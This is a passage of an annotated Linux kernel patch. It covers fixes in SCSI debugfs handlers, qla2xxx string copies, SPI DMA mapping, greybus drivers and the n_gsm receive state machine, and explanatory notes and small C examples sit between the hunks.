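static const struct of_device_id example_of_match[] = {
	{ .compatible = "vendor,example-device", },	/* hypothetical */
	{ /* sentinel */ },
};
/* Emits the aliases that let udev autoload the module for this node. */
MODULE_DEVICE_TABLE(of, example_of_match);
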
+diff --git a/drivers/s390/cio/trace.h b/drivers/s390/cio/trace.h
+index 86993de253451..a4c5c6736b310 100644
+--- a/drivers/s390/cio/trace.h
++++ b/drivers/s390/cio/trace.h
+@@ -50,7 +50,7 @@ DECLARE_EVENT_CLASS(s390_class_schib,
+ 		__entry->devno = schib->pmcw.dev;
+ 		__entry->schib = *schib;
+ 		__entry->pmcw_ena = schib->pmcw.ena;
+-		__entry->pmcw_st = schib->pmcw.ena;
++		__entry->pmcw_st = schib->pmcw.st;
+ 		__entry->pmcw_dnv = schib->pmcw.dnv;
+ 		__entry->pmcw_dev = schib->pmcw.dev;
+ 		__entry->pmcw_lpm = schib->pmcw.lpm;
+diff --git a/drivers/scsi/bfa/bfad_debugfs.c b/drivers/scsi/bfa/bfad_debugfs.c
+index 52db147d9979d..f6dd077d47c9a 100644
+--- a/drivers/scsi/bfa/bfad_debugfs.c
++++ b/drivers/scsi/bfa/bfad_debugfs.c
+@@ -250,7 +250,7 @@ bfad_debugfs_write_regrd(struct file *file, const char __user *buf,
+ 	unsigned long flags;
+ 	void *kern_buf;
+ 
+-	kern_buf = memdup_user(buf, nbytes);
++	kern_buf = memdup_user_nul(buf, nbytes);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
+@@ -317,7 +317,7 @@ bfad_debugfs_write_regwr(struct file *file, const char __user *buf,
+ 	unsigned long flags;
+ 	void *kern_buf;
+ 
+-	kern_buf = memdup_user(buf, nbytes);
++	kern_buf = memdup_user_nul(buf, nbytes);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
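
Both debugfs write fixes in this patch (bfa here, qedf below) switch memdup_user() to memdup_user_nul(): the copied buffer is then parsed with sscanf() and friends, which need NUL termination, and memdup_user_nul() allocates len + 1 bytes and terminates the copy while memdup_user() does not. The pattern in isolation (handler name is illustrative):

#include <linux/err.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/string.h>

static ssize_t example_write(struct file *file, const char __user *buf,
			     size_t nbytes, loff_t *ppos)
{
	char *kern_buf;

	/* Allocates nbytes + 1 and NUL-terminates: safe to parse as a string. */
	kern_buf = memdup_user_nul(buf, nbytes);
	if (IS_ERR(kern_buf))
		return PTR_ERR(kern_buf);

	/* ... sscanf(kern_buf, ...) on a guaranteed-terminated buffer ... */

	kfree(kern_buf);
	return nbytes;
}
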
+diff --git a/drivers/scsi/hpsa.c b/drivers/scsi/hpsa.c
+index f6da34850af9d..e529b3d3eaf39 100644
+--- a/drivers/scsi/hpsa.c
++++ b/drivers/scsi/hpsa.c
+@@ -5850,7 +5850,7 @@ static int hpsa_scsi_host_alloc(struct ctlr_info *h)
+ {
+ 	struct Scsi_Host *sh;
+ 
+-	sh = scsi_host_alloc(&hpsa_driver_template, sizeof(struct ctlr_info));
++	sh = scsi_host_alloc(&hpsa_driver_template, sizeof(struct ctlr_info *));
+ 	if (sh == NULL) {
+ 		dev_err(&h->pdev->dev, "scsi_host_alloc failed\n");
+ 		return -ENOMEM;
+diff --git a/drivers/scsi/libsas/sas_expander.c b/drivers/scsi/libsas/sas_expander.c
+index 4b5ceba68e46e..ffec7f0e51fcd 100644
+--- a/drivers/scsi/libsas/sas_expander.c
++++ b/drivers/scsi/libsas/sas_expander.c
+@@ -239,8 +239,7 @@ static void sas_set_ex_phy(struct domain_device *dev, int phy_id,
+ 	/* help some expanders that fail to zero sas_address in the 'no
+ 	 * device' case
+ 	 */
+-	if (phy->attached_dev_type == SAS_PHY_UNUSED ||
+-	    phy->linkrate < SAS_LINK_RATE_1_5_GBPS)
++	if (phy->attached_dev_type == SAS_PHY_UNUSED)
+ 		memset(phy->attached_sas_addr, 0, SAS_ADDR_SIZE);
+ 	else
+ 		memcpy(phy->attached_sas_addr, dr->attached_sas_addr, SAS_ADDR_SIZE);
+diff --git a/drivers/scsi/qedf/qedf_debugfs.c b/drivers/scsi/qedf/qedf_debugfs.c
+index 451fd236bfd05..96174353e3898 100644
+--- a/drivers/scsi/qedf/qedf_debugfs.c
++++ b/drivers/scsi/qedf/qedf_debugfs.c
+@@ -170,7 +170,7 @@ qedf_dbg_debug_cmd_write(struct file *filp, const char __user *buffer,
+ 	if (!count || *ppos)
+ 		return 0;
+ 
+-	kern_buf = memdup_user(buffer, count);
++	kern_buf = memdup_user_nul(buffer, count);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index a7a364760b800..081af4d420a05 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -274,7 +274,7 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 		seq_printf(s, "Driver: estimate iocb used [%d] high water limit [%d]\n",
+ 			   iocbs_used, ha->base_qpair->fwres.iocbs_limit);
+ 
+-		seq_printf(s, "estimate exchange used[%d] high water limit [%d] n",
++		seq_printf(s, "estimate exchange used[%d] high water limit [%d]\n",
+ 			   exch_used, ha->base_qpair->fwres.exch_limit);
+ 
+ 		if (ql2xenforce_iocb_limit == 2) {
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index c64e44964d840..6dce3f166564c 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -5144,7 +5144,7 @@ qla2x00_set_model_info(scsi_qla_host_t *vha, uint8_t *model, size_t len,
+ 		if (use_tbl &&
+ 		    ha->pdev->subsystem_vendor == PCI_VENDOR_ID_QLOGIC &&
+ 		    index < QLA_MODEL_NAMES)
+-			strlcpy(ha->model_desc,
++			strscpy(ha->model_desc,
+ 			    qla2x00_model_name[index * 2 + 1],
+ 			    sizeof(ha->model_desc));
+ 	} else {
+@@ -5152,14 +5152,14 @@ qla2x00_set_model_info(scsi_qla_host_t *vha, uint8_t *model, size_t len,
+ 		if (use_tbl &&
+ 		    ha->pdev->subsystem_vendor == PCI_VENDOR_ID_QLOGIC &&
+ 		    index < QLA_MODEL_NAMES) {
+-			strlcpy(ha->model_number,
++			strscpy(ha->model_number,
+ 				qla2x00_model_name[index * 2],
+ 				sizeof(ha->model_number));
+-			strlcpy(ha->model_desc,
++			strscpy(ha->model_desc,
+ 			    qla2x00_model_name[index * 2 + 1],
+ 			    sizeof(ha->model_desc));
+ 		} else {
+-			strlcpy(ha->model_number, def,
++			strscpy(ha->model_number, def,
+ 				sizeof(ha->model_number));
+ 		}
+ 	}
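
The qla2xxx hunks here and in qla_mr.c below are a mechanical strlcpy() to strscpy() conversion. Both always NUL-terminate, but strlcpy() returns the full source length (and so reads past size bytes of an unterminated source), while strscpy() returns the number of characters copied, or -E2BIG on truncation. A userspace model of the strscpy() return semantics, under the simplified behaviour just described:

#include <stdio.h>
#include <string.h>

#define MY_E2BIG 7	/* stands in for the kernel's E2BIG */

/* Simplified model of strscpy(): copied length, or -E2BIG on truncation. */
static long my_strscpy(char *dst, const char *src, size_t size)
{
	size_t len = strnlen(src, size);

	if (len == size) {		/* source does not fit */
		if (size) {
			memcpy(dst, src, size - 1);
			dst[size - 1] = '\0';	/* still NUL-terminated */
		}
		return -MY_E2BIG;
	}
	memcpy(dst, src, len + 1);
	return (long)len;
}

int main(void)
{
	char buf[8];

	printf("%ld\n", my_strscpy(buf, "short", sizeof(buf)));	/* 5 */
	printf("%ld\n", my_strscpy(buf, "far too long", sizeof(buf)));	/* -7 */
	return 0;
}
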
+diff --git a/drivers/scsi/qla2xxx/qla_mr.c b/drivers/scsi/qla2xxx/qla_mr.c
+index f726eb8449c5e..083f94e43fba0 100644
+--- a/drivers/scsi/qla2xxx/qla_mr.c
++++ b/drivers/scsi/qla2xxx/qla_mr.c
+@@ -691,7 +691,7 @@ qlafx00_pci_info_str(struct scsi_qla_host *vha, char *str, size_t str_len)
+ 	struct qla_hw_data *ha = vha->hw;
+ 
+ 	if (pci_is_pcie(ha->pdev))
+-		strlcpy(str, "PCIe iSA", str_len);
++		strscpy(str, "PCIe iSA", str_len);
+ 	return str;
+ }
+ 
+@@ -1850,21 +1850,21 @@ qlafx00_fx_disc(scsi_qla_host_t *vha, fc_port_t *fcport, uint16_t fx_type)
+ 			phost_info = &preg_hsi->hsi;
+ 			memset(preg_hsi, 0, sizeof(struct register_host_info));
+ 			phost_info->os_type = OS_TYPE_LINUX;
+-			strlcpy(phost_info->sysname, p_sysid->sysname,
++			strscpy(phost_info->sysname, p_sysid->sysname,
+ 				sizeof(phost_info->sysname));
+-			strlcpy(phost_info->nodename, p_sysid->nodename,
++			strscpy(phost_info->nodename, p_sysid->nodename,
+ 				sizeof(phost_info->nodename));
+ 			if (!strcmp(phost_info->nodename, "(none)"))
+ 				ha->mr.host_info_resend = true;
+-			strlcpy(phost_info->release, p_sysid->release,
++			strscpy(phost_info->release, p_sysid->release,
+ 				sizeof(phost_info->release));
+-			strlcpy(phost_info->version, p_sysid->version,
++			strscpy(phost_info->version, p_sysid->version,
+ 				sizeof(phost_info->version));
+-			strlcpy(phost_info->machine, p_sysid->machine,
++			strscpy(phost_info->machine, p_sysid->machine,
+ 				sizeof(phost_info->machine));
+-			strlcpy(phost_info->domainname, p_sysid->domainname,
++			strscpy(phost_info->domainname, p_sysid->domainname,
+ 				sizeof(phost_info->domainname));
+-			strlcpy(phost_info->hostdriver, QLA2XXX_VERSION,
++			strscpy(phost_info->hostdriver, QLA2XXX_VERSION,
+ 				sizeof(phost_info->hostdriver));
+ 			preg_hsi->utc = (uint64_t)ktime_get_real_seconds();
+ 			ql_dbg(ql_dbg_init, vha, 0x0149,
+@@ -1909,9 +1909,9 @@ qlafx00_fx_disc(scsi_qla_host_t *vha, fc_port_t *fcport, uint16_t fx_type)
+ 	if (fx_type == FXDISC_GET_CONFIG_INFO) {
+ 		struct config_info_data *pinfo =
+ 		    (struct config_info_data *) fdisc->u.fxiocb.rsp_addr;
+-		strlcpy(vha->hw->model_number, pinfo->model_num,
++		strscpy(vha->hw->model_number, pinfo->model_num,
+ 			ARRAY_SIZE(vha->hw->model_number));
+-		strlcpy(vha->hw->model_desc, pinfo->model_description,
++		strscpy(vha->hw->model_desc, pinfo->model_description,
+ 			ARRAY_SIZE(vha->hw->model_desc));
+ 		memcpy(&vha->hw->mr.symbolic_name, pinfo->symbolic_name,
+ 		    sizeof(vha->hw->mr.symbolic_name));
+diff --git a/drivers/soc/mediatek/mtk-cmdq-helper.c b/drivers/soc/mediatek/mtk-cmdq-helper.c
+index c1837a4682673..3ed8bd63f7e14 100644
+--- a/drivers/soc/mediatek/mtk-cmdq-helper.c
++++ b/drivers/soc/mediatek/mtk-cmdq-helper.c
+@@ -13,7 +13,8 @@
+ #define CMDQ_POLL_ENABLE_MASK	BIT(0)
+ #define CMDQ_EOC_IRQ_EN		BIT(0)
+ #define CMDQ_REG_TYPE		1
+-#define CMDQ_JUMP_RELATIVE	1
++#define CMDQ_JUMP_RELATIVE	0
++#define CMDQ_JUMP_ABSOLUTE	1
+ 
+ struct cmdq_instruction {
+ 	union {
+@@ -396,7 +397,7 @@ int cmdq_pkt_jump(struct cmdq_pkt *pkt, dma_addr_t addr)
+ 	struct cmdq_instruction inst = {};
+ 
+ 	inst.op = CMDQ_CODE_JUMP;
+-	inst.offset = CMDQ_JUMP_RELATIVE;
++	inst.offset = CMDQ_JUMP_ABSOLUTE;
+ 	inst.value = addr >>
+ 		cmdq_get_shift_pa(((struct cmdq_client *)pkt->cl)->chan);
+ 	return cmdq_pkt_append_command(pkt, inst);
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index 7286c9b3be691..5bd874e58dd6e 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -1847,7 +1847,7 @@ struct sdw_cdns_pdi *sdw_cdns_alloc_pdi(struct sdw_cdns *cdns,
+ 
+ 	/* check if we found a PDI, else find in bi-directional */
+ 	if (!pdi)
+-		pdi = cdns_find_pdi(cdns, 2, stream->num_bd, stream->bd,
++		pdi = cdns_find_pdi(cdns, 0, stream->num_bd, stream->bd,
+ 				    dai_id);
+ 
+ 	if (pdi) {
+diff --git a/drivers/spi/spi-stm32.c b/drivers/spi/spi-stm32.c
+index 12241815510d4..c37d557f7d03c 100644
+--- a/drivers/spi/spi-stm32.c
++++ b/drivers/spi/spi-stm32.c
+@@ -884,7 +884,7 @@ static irqreturn_t stm32h7_spi_irq_thread(int irq, void *dev_id)
+ 		mask |= STM32H7_SPI_SR_TXP | STM32H7_SPI_SR_RXP;
+ 
+ 	if (!(sr & mask)) {
+-		dev_warn(spi->dev, "spurious IT (sr=0x%08x, ier=0x%08x)\n",
++		dev_vdbg(spi->dev, "spurious IT (sr=0x%08x, ier=0x%08x)\n",
+ 			 sr, ier);
+ 		spin_unlock_irqrestore(&spi->lock, flags);
+ 		return IRQ_NONE;
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 1018feff468c9..50fe5aa450f84 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -1147,6 +1147,7 @@ static int __spi_map_msg(struct spi_controller *ctlr, struct spi_message *msg)
+ 	else
+ 		rx_dev = ctlr->dev.parent;
+ 
++	ret = -ENOMSG;
+ 	list_for_each_entry(xfer, &msg->transfers, transfer_list) {
+ 		/* The sync is done before each transfer. */
+ 		unsigned long attrs = DMA_ATTR_SKIP_CPU_SYNC;
+@@ -1176,6 +1177,9 @@ static int __spi_map_msg(struct spi_controller *ctlr, struct spi_message *msg)
+ 			}
+ 		}
+ 	}
++	/* No transfer has been mapped, bail out with success */
++	if (ret)
++		return 0;
+ 
+ 	ctlr->cur_rx_dma_dev = rx_dev;
+ 	ctlr->cur_tx_dma_dev = tx_dev;
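
The __spi_map_msg() change seeds ret with -ENOMSG before the loop; only a transfer that is actually DMA-mapped clears it, so a message whose transfers were all skipped bails out successfully without recording cur_rx_dma_dev/cur_tx_dma_dev for a mapping that never happened. The sentinel-error idiom reduced to a standalone sketch (the sentinel value stands in for -ENOMSG):

#include <stdbool.h>
#include <stdio.h>

#define SENTINEL (-42)	/* stands in for -ENOMSG */

static int map_all(const bool *can_map, int n)
{
	int ret = SENTINEL;

	for (int i = 0; i < n; i++) {
		if (!can_map[i])
			continue;	/* skipped transfer: ret untouched */
		ret = 0;		/* at least one transfer was mapped */
	}
	/* Nothing was mapped: succeed without committing any mapping state. */
	if (ret)
		return 0;

	/* ... record the devices used for the mapping here ... */
	return 0;
}

int main(void)
{
	bool none[2] = { false, false };

	printf("%d\n", map_all(none, 2));	/* 0, but no state committed */
	return 0;
}
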
+diff --git a/drivers/staging/greybus/arche-apb-ctrl.c b/drivers/staging/greybus/arche-apb-ctrl.c
+index 45afa208d0044..4f9403f3d0cdd 100644
+--- a/drivers/staging/greybus/arche-apb-ctrl.c
++++ b/drivers/staging/greybus/arche-apb-ctrl.c
+@@ -468,6 +468,7 @@ static const struct of_device_id arche_apb_ctrl_of_match[] = {
+ 	{ .compatible = "usbffff,2", },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(of, arche_apb_ctrl_of_match);
+ 
+ static struct platform_driver arche_apb_ctrl_device_driver = {
+ 	.probe		= arche_apb_ctrl_probe,
+diff --git a/drivers/staging/greybus/arche-platform.c b/drivers/staging/greybus/arche-platform.c
+index fcbd5f71eff27..4850bc64d3fd7 100644
+--- a/drivers/staging/greybus/arche-platform.c
++++ b/drivers/staging/greybus/arche-platform.c
+@@ -620,14 +620,7 @@ static const struct of_device_id arche_platform_of_match[] = {
+ 	{ .compatible = "google,arche-platform", },
+ 	{ },
+ };
+-
+-static const struct of_device_id arche_combined_id[] = {
+-	/* Use PID/VID of SVC device */
+-	{ .compatible = "google,arche-platform", },
+-	{ .compatible = "usbffff,2", },
+-	{ },
+-};
+-MODULE_DEVICE_TABLE(of, arche_combined_id);
++MODULE_DEVICE_TABLE(of, arche_platform_of_match);
+ 
+ static struct platform_driver arche_platform_device_driver = {
+ 	.probe		= arche_platform_probe,
+diff --git a/drivers/staging/greybus/light.c b/drivers/staging/greybus/light.c
+index c6bd86a5335ab..9999f84016992 100644
+--- a/drivers/staging/greybus/light.c
++++ b/drivers/staging/greybus/light.c
+@@ -147,6 +147,9 @@ static int __gb_lights_flash_brightness_set(struct gb_channel *channel)
+ 		channel = get_channel_from_mode(channel->light,
+ 						GB_CHANNEL_MODE_TORCH);
+ 
++	if (!channel)
++		return -EINVAL;
++
+ 	/* For not flash we need to convert brightness to intensity */
+ 	intensity = channel->intensity_uA.min +
+ 			(channel->intensity_uA.step * channel->led->brightness);
+@@ -549,7 +552,10 @@ static int gb_lights_light_v4l2_register(struct gb_light *light)
+ 	}
+ 
+ 	channel_flash = get_channel_from_mode(light, GB_CHANNEL_MODE_FLASH);
+-	WARN_ON(!channel_flash);
++	if (!channel_flash) {
++		dev_err(dev, "failed to get flash channel from mode\n");
++		return -EINVAL;
++	}
+ 
+ 	fled = &channel_flash->fled;
+ 
+diff --git a/drivers/staging/media/atomisp/pci/sh_css.c b/drivers/staging/media/atomisp/pci/sh_css.c
+index da96aaffebc19..738c0d634ea90 100644
+--- a/drivers/staging/media/atomisp/pci/sh_css.c
++++ b/drivers/staging/media/atomisp/pci/sh_css.c
+@@ -4972,6 +4972,7 @@ static int load_video_binaries(struct ia_css_pipe *pipe)
+ 						  sizeof(struct ia_css_binary),
+ 						  GFP_KERNEL);
+ 		if (!mycs->yuv_scaler_binary) {
++			mycs->num_yuv_scaler = 0;
+ 			err = -ENOMEM;
+ 			return err;
+ 		}
+diff --git a/drivers/thermal/qcom/tsens.c b/drivers/thermal/qcom/tsens.c
+index 252c5ffdd1b66..fc58db60852a0 100644
+--- a/drivers/thermal/qcom/tsens.c
++++ b/drivers/thermal/qcom/tsens.c
+@@ -85,7 +85,7 @@ void compute_intercept_slope(struct tsens_priv *priv, u32 *p1,
+ 	for (i = 0; i < priv->num_sensors; i++) {
+ 		dev_dbg(priv->dev,
+ 			"%s: sensor%d - data_point1:%#x data_point2:%#x\n",
+-			__func__, i, p1[i], p2[i]);
++			__func__, i, p1[i], p2 ? p2[i] : 0);
+ 
+ 		if (!priv->sensor[i].slope)
+ 			priv->sensor[i].slope = SLOPE_DEFAULT;
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index d2daf0a72e347..9997d73d5f568 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -202,16 +202,18 @@ enum gsm_encoding {
+ 
+ enum gsm_mux_state {
+ 	GSM_SEARCH,
+-	GSM_START,
+-	GSM_ADDRESS,
+-	GSM_CONTROL,
+-	GSM_LEN,
+-	GSM_DATA,
+-	GSM_FCS,
+-	GSM_OVERRUN,
+-	GSM_LEN0,
+-	GSM_LEN1,
+-	GSM_SSOF,
++	GSM0_ADDRESS,
++	GSM0_CONTROL,
++	GSM0_LEN0,
++	GSM0_LEN1,
++	GSM0_DATA,
++	GSM0_FCS,
++	GSM0_SSOF,
++	GSM1_START,
++	GSM1_ADDRESS,
++	GSM1_CONTROL,
++	GSM1_DATA,
++	GSM1_OVERRUN,
+ };
+ 
+ /*
+@@ -2259,6 +2261,30 @@ static void gsm_queue(struct gsm_mux *gsm)
+ 	return;
+ }
+ 
++/**
++ * gsm0_receive_state_check_and_fix	-	check and correct receive state
++ * @gsm: gsm data for this ldisc instance
++ *
++ * Ensures that the current receive state is valid for basic option mode.
++ */
++
++static void gsm0_receive_state_check_and_fix(struct gsm_mux *gsm)
++{
++	switch (gsm->state) {
++	case GSM_SEARCH:
++	case GSM0_ADDRESS:
++	case GSM0_CONTROL:
++	case GSM0_LEN0:
++	case GSM0_LEN1:
++	case GSM0_DATA:
++	case GSM0_FCS:
++	case GSM0_SSOF:
++		break;
++	default:
++		gsm->state = GSM_SEARCH;
++		break;
++	}
++}
+ 
+ /**
+  *	gsm0_receive	-	perform processing for non-transparency
+@@ -2272,26 +2298,27 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ {
+ 	unsigned int len;
+ 
++	gsm0_receive_state_check_and_fix(gsm);
+ 	switch (gsm->state) {
+ 	case GSM_SEARCH:	/* SOF marker */
+ 		if (c == GSM0_SOF) {
+-			gsm->state = GSM_ADDRESS;
++			gsm->state = GSM0_ADDRESS;
+ 			gsm->address = 0;
+ 			gsm->len = 0;
+ 			gsm->fcs = INIT_FCS;
+ 		}
+ 		break;
+-	case GSM_ADDRESS:	/* Address EA */
++	case GSM0_ADDRESS:	/* Address EA */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		if (gsm_read_ea(&gsm->address, c))
+-			gsm->state = GSM_CONTROL;
++			gsm->state = GSM0_CONTROL;
+ 		break;
+-	case GSM_CONTROL:	/* Control Byte */
++	case GSM0_CONTROL:	/* Control Byte */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		gsm->control = c;
+-		gsm->state = GSM_LEN0;
++		gsm->state = GSM0_LEN0;
+ 		break;
+-	case GSM_LEN0:		/* Length EA */
++	case GSM0_LEN0:		/* Length EA */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		if (gsm_read_ea(&gsm->len, c)) {
+ 			if (gsm->len > gsm->mru) {
+@@ -2301,14 +2328,14 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ 			}
+ 			gsm->count = 0;
+ 			if (!gsm->len)
+-				gsm->state = GSM_FCS;
++				gsm->state = GSM0_FCS;
+ 			else
+-				gsm->state = GSM_DATA;
++				gsm->state = GSM0_DATA;
+ 			break;
+ 		}
+-		gsm->state = GSM_LEN1;
++		gsm->state = GSM0_LEN1;
+ 		break;
+-	case GSM_LEN1:
++	case GSM0_LEN1:
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		len = c;
+ 		gsm->len |= len << 7;
+@@ -2319,26 +2346,29 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ 		}
+ 		gsm->count = 0;
+ 		if (!gsm->len)
+-			gsm->state = GSM_FCS;
++			gsm->state = GSM0_FCS;
+ 		else
+-			gsm->state = GSM_DATA;
++			gsm->state = GSM0_DATA;
+ 		break;
+-	case GSM_DATA:		/* Data */
++	case GSM0_DATA:		/* Data */
+ 		gsm->buf[gsm->count++] = c;
+-		if (gsm->count == gsm->len) {
++		if (gsm->count >= MAX_MRU) {
++			gsm->bad_size++;
++			gsm->state = GSM_SEARCH;
++		} else if (gsm->count >= gsm->len) {
+ 			/* Calculate final FCS for UI frames over all data */
+ 			if ((gsm->control & ~PF) != UIH) {
+ 				gsm->fcs = gsm_fcs_add_block(gsm->fcs, gsm->buf,
+ 							     gsm->count);
+ 			}
+-			gsm->state = GSM_FCS;
++			gsm->state = GSM0_FCS;
+ 		}
+ 		break;
+-	case GSM_FCS:		/* FCS follows the packet */
++	case GSM0_FCS:		/* FCS follows the packet */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+-		gsm->state = GSM_SSOF;
++		gsm->state = GSM0_SSOF;
+ 		break;
+-	case GSM_SSOF:
++	case GSM0_SSOF:
+ 		gsm->state = GSM_SEARCH;
+ 		if (c == GSM0_SOF)
+ 			gsm_queue(gsm);
+@@ -2351,6 +2381,29 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ 	}
+ }
+ 
++/**
++ * gsm1_receive_state_check_and_fix	-	check and correct receive state
++ * @gsm: gsm data for this ldisc instance
++ *
++ * Ensures that the current receive state is valid for advanced option mode.
++ */
++
++static void gsm1_receive_state_check_and_fix(struct gsm_mux *gsm)
++{
++	switch (gsm->state) {
++	case GSM_SEARCH:
++	case GSM1_START:
++	case GSM1_ADDRESS:
++	case GSM1_CONTROL:
++	case GSM1_DATA:
++	case GSM1_OVERRUN:
++		break;
++	default:
++		gsm->state = GSM_SEARCH;
++		break;
++	}
++}
++
+ /**
+  *	gsm1_receive	-	perform processing for non-transparency
+  *	@gsm: gsm data for this ldisc instance
+@@ -2361,6 +2414,7 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ 
+ static void gsm1_receive(struct gsm_mux *gsm, unsigned char c)
+ {
++	gsm1_receive_state_check_and_fix(gsm);
+ 	/* handle XON/XOFF */
+ 	if ((c & ISO_IEC_646_MASK) == XON) {
+ 		gsm->constipated = true;
+@@ -2373,11 +2427,11 @@ static void gsm1_receive(struct gsm_mux *gsm, unsigned char c)
+ 	}
+ 	if (c == GSM1_SOF) {
+ 		/* EOF is only valid in frame if we have got to the data state */
+-		if (gsm->state == GSM_DATA) {
++		if (gsm->state == GSM1_DATA) {
+ 			if (gsm->count < 1) {
+ 				/* Missing FSC */
+ 				gsm->malformed++;
+-				gsm->state = GSM_START;
++				gsm->state = GSM1_START;
+ 				return;
+ 			}
+ 			/* Remove the FCS from data */
+@@ -2393,14 +2447,14 @@ static void gsm1_receive(struct gsm_mux *gsm, unsigned char c)
+ 			gsm->fcs = gsm_fcs_add(gsm->fcs, gsm->buf[gsm->count]);
+ 			gsm->len = gsm->count;
+ 			gsm_queue(gsm);
+-			gsm->state  = GSM_START;
++			gsm->state  = GSM1_START;
+ 			return;
+ 		}
+ 		/* Any partial frame was a runt so go back to start */
+-		if (gsm->state != GSM_START) {
++		if (gsm->state != GSM1_START) {
+ 			if (gsm->state != GSM_SEARCH)
+ 				gsm->malformed++;
+-			gsm->state = GSM_START;
++			gsm->state = GSM1_START;
+ 		}
+ 		/* A SOF in GSM_START means we are still reading idling or
+ 		   framing bytes */
+@@ -2421,30 +2475,30 @@ static void gsm1_receive(struct gsm_mux *gsm, unsigned char c)
+ 		gsm->escape = false;
+ 	}
+ 	switch (gsm->state) {
+-	case GSM_START:		/* First byte after SOF */
++	case GSM1_START:		/* First byte after SOF */
+ 		gsm->address = 0;
+-		gsm->state = GSM_ADDRESS;
++		gsm->state = GSM1_ADDRESS;
+ 		gsm->fcs = INIT_FCS;
+ 		fallthrough;
+-	case GSM_ADDRESS:	/* Address continuation */
++	case GSM1_ADDRESS:	/* Address continuation */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		if (gsm_read_ea(&gsm->address, c))
+-			gsm->state = GSM_CONTROL;
++			gsm->state = GSM1_CONTROL;
+ 		break;
+-	case GSM_CONTROL:	/* Control Byte */
++	case GSM1_CONTROL:	/* Control Byte */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		gsm->control = c;
+ 		gsm->count = 0;
+-		gsm->state = GSM_DATA;
++		gsm->state = GSM1_DATA;
+ 		break;
+-	case GSM_DATA:		/* Data */
+-		if (gsm->count > gsm->mru) {	/* Allow one for the FCS */
+-			gsm->state = GSM_OVERRUN;
++	case GSM1_DATA:		/* Data */
++		if (gsm->count > gsm->mru || gsm->count > MAX_MRU) {	/* Allow one for the FCS */
++			gsm->state = GSM1_OVERRUN;
+ 			gsm->bad_size++;
+ 		} else
+ 			gsm->buf[gsm->count++] = c;
+ 		break;
+-	case GSM_OVERRUN:	/* Over-long - eg a dropped SOF */
++	case GSM1_OVERRUN:	/* Over-long - eg a dropped SOF */
+ 		break;
+ 	default:
+ 		pr_debug("%s: unhandled state: %d\n", __func__, gsm->state);
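
The n_gsm rework splits the receive-state enum into disjoint GSM0_* (basic option) and GSM1_* (advanced option) namespaces and re-validates the state on entry to each receiver, so a mode switch mid-stream can no longer leave one decoder running with the other decoder's state; the new MAX_MRU bounds also stop gsm->buf overruns. The check-on-entry pattern in miniature (enum and function names here are illustrative):

enum rx_state {
	RX_SEARCH,
	/* basic-option (mode 0) states */
	RX0_ADDRESS, RX0_CONTROL, RX0_DATA,
	/* advanced-option (mode 1) states */
	RX1_START, RX1_ADDRESS, RX1_DATA,
};

/* Entry check: force any state foreign to this decoder back to SEARCH. */
static enum rx_state rx0_fix_state(enum rx_state s)
{
	switch (s) {
	case RX_SEARCH:
	case RX0_ADDRESS:
	case RX0_CONTROL:
	case RX0_DATA:
		return s;
	default:
		return RX_SEARCH;	/* e.g. a leftover RX1_* state */
	}
}
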
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index ffc7f67e27e35..a28f115f6194b 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -674,18 +674,46 @@ static void init_real_clk_rates(struct device *dev, struct brcmuart_priv *priv)
+ 	clk_set_rate(priv->baud_mux_clk, priv->default_mux_rate);
+ }
+ 
++static u32 find_quot(struct device *dev, u32 freq, u32 baud, u32 *percent)
++{
++	u32 quot;
++	u32 rate;
++	u64 hires_rate;
++	u64 hires_baud;
++	u64 hires_err;
++
++	rate = freq / 16;
++	quot = DIV_ROUND_CLOSEST(rate, baud);
++	if (!quot)
++		return 0;
++
++	/* increase resolution to get xx.xx percent */
++	hires_rate = div_u64((u64)rate * 10000, (u64)quot);
++	hires_baud = (u64)baud * 10000;
++
++	/* get the delta */
++	if (hires_rate > hires_baud)
++		hires_err = (hires_rate - hires_baud);
++	else
++		hires_err = (hires_baud - hires_rate);
++
++	*percent = (unsigned long)DIV_ROUND_CLOSEST_ULL(hires_err, baud);
++
++	dev_dbg(dev, "Baud rate: %u, MUX Clk: %u, Error: %u.%u%%\n",
++		baud, freq, *percent / 100, *percent % 100);
++
++	return quot;
++}
++
